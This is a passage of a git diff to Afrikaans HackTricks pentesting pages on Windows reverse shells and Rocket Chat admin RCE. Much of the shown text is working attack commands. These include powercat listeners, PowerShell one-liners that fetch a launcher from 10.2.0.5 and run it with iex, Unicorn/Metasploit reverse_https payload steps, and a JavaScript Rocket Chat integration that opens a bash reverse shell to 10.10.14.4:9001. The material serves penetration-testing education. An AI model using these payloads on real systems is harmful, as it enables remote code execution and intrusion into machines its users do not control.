10.1.1.15 -p 443 -e cmd -g +Start A Persistent Server That Serves a File: +powercat -l -p 443 -i C:\inputfile -rep +``` +### Empire + +[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire) + +Skep 'n powershell-lanser, stoor dit in 'n lêer en laai dit af en voer dit uit. +``` +powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" +``` +**Gedig as kwaadwillige kode** + +### MSF-Unicorn + +[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn) + +Skep 'n powershell weergawe van metasploit agterdeur met behulp van unicorn +``` +python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443 +``` +Begin msfconsole met die geskepte hulpbron: +``` +msfconsole -r unicorn.rc +``` +Begin 'n webbediener wat die _powershell\_attack.txt_ lêer bedien en voer uit in die slagoffer: +``` +powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex" +``` +**Gedig as kwaadwillige kode** + +## Meer + +[PS>Attack](https://github.com/jaredhaight/PSAttack) PS-konsol met 'n paar offensiewe PS-modules vooraf gelaai (gecyfer)\ +[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9)[\ +WinPWN](https://github.com/SecureThisShit/WinPwn) PS-konsol met 'n paar offensiewe PS-modules en proxy-detektering (IEX) + +## Verwysings + +* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) +* [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x) +* [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT) +* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/) +* [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/) +* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) +* [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +​ +**Probeer Hard Sekuriteitsgroep** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +{% hint style="success" %} +Leer & oefen AWS Hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Ondersteun HackTricks + +* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)! +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md index 7d78e5916..da69cef74 100644 --- a/network-services-pentesting/pentesting-web/rocket-chat.md +++ b/network-services-pentesting/pentesting-web/rocket-chat.md @@ -1,8 +1,8 @@ # Rocket Chat {% hint style="success" %} -Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -14,7 +14,6 @@ Leer & oefen GCP Hacking: {% endhint %} -{% endhint %}
@@ -29,7 +28,7 @@ As jy admin binne Rocket Chat is, kan jy RCE kry.
-* Volgens die [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), gebruik albei ES2015 / ECMAScript 6 ([basies JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) om die data te verwerk. So kom ons kry 'n [rev shell vir javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) soos: +* Volgens die [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), gebruik albei ES2015 / ECMAScript 6 ([basies JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) om die data te verwerk. So kom ons kry 'n [rev shell vir javascript](../../generic-methodologies-and-resources/reverse-shells/linux.md#nodejs) soos: ```javascript const require = console.log.constructor('return process.mainModule.require')(); const { exec } = require('child_process'); @@ -48,14 +47,15 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
-* Bel dit met curl en jy behoort die rev shell te ontvang +* Roep dit aan met curl en jy behoort die rev shell te ontvang
{% embed url="https://websec.nl/" %} + {% hint style="success" %} -Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Leer & oefen AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Leer & oefen GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -67,5 +67,3 @@ Leer & oefen GCP Hacking: {% endhint %} -
-{% endhint %}